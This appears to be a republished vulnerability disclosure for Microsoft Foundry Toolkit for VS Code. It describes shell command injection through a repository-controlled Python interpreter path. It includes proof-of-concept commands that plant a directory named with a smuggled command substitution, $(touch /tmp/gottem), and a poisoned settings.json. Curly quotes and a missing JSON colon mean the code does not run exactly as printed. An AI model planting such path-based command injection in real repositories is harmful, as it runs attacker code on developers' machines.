Microsoft Foundry Toolkit for VS Code: Command Injection via Python Interpreter Path Leading to Arbitrary Code Execution

By
Editor Dataproof
-
0
19

Microsoft Foundry Toolkit for VS Code: Command Injection via Python Interpreter Path Leading to Arbitrary Code Execution

Microsoft Foundry Toolkit for VS Code (formerly AI Toolkit for VS Code) uses child_process.exec() with string interpolation to build shell commands that include a Python interpreter path obtained from the Python extension API (ms-python.python via getExecutionDetails()).

The interpreter path can be controlled by a repository through .vscode/settings.json (python.defaultInterpreterPath). On Linux/macOS, this can be abused for shell command injection because the extension wraps the path in double quotes and passes it to exec() (which invokes a shell). Command substitution such as $(…) is evaluated inside double quotes by POSIX shells.

 

Proof of Concept 

I validated arbitrary command execution on AI Toolkit version 0.31.2026021209 by pointing python.defaultInterpreterPath to a real Python interpreter located under a directory whose literal name contains $(touch /tmp/gottem)

 

Create the PoC repository and files:

mkdir -p malicious-project/.aitk malicious-project/.vscode

echo ‘{}’ > malicious-project/.aitk/config.json

mkdir -p ‘malicious-project/$(touch /tmp/gottem)’

ln -sf /usr/bin/python3 ‘malicious-project/$(touch /tmp/gottem)/python3’

Set the poisoned interpreter path using the absolute repository path:

REPO_PATH=$(cd malicious-project && pwd)”

# Note: \$ escapes the dollar sign so the literal string $(touch …)

# ends up in the JSON, while ${REPO_PATH} expands to the real path.

cat > malicious-project/.vscode/settings.json << JSONEOF

{

  “python.defaultInterpreterPath”“${REPO_PATH}/\$(touch /tmp/gottem)/python3”

}

JSONEOF

 

Open the repository in VS Code with AI Toolkit and Python extension installed:

code malicious-project/

In VS Code, click the AI Toolkit Testing view in the sidebar (the potion icon).

In the AI Toolkit Testing panel, click Run Evaluation in Foundry (this reaches pytest –collect-evals). No other files need to be opened first; the Python extension resolves the interpreter path from workspace settings when AI Toolkit requests it.

Verify execution:

ls -la /tmp/gottem

 

Ben Smith
– Read more

RELATED ARTICLESMORE FROM AUTHOR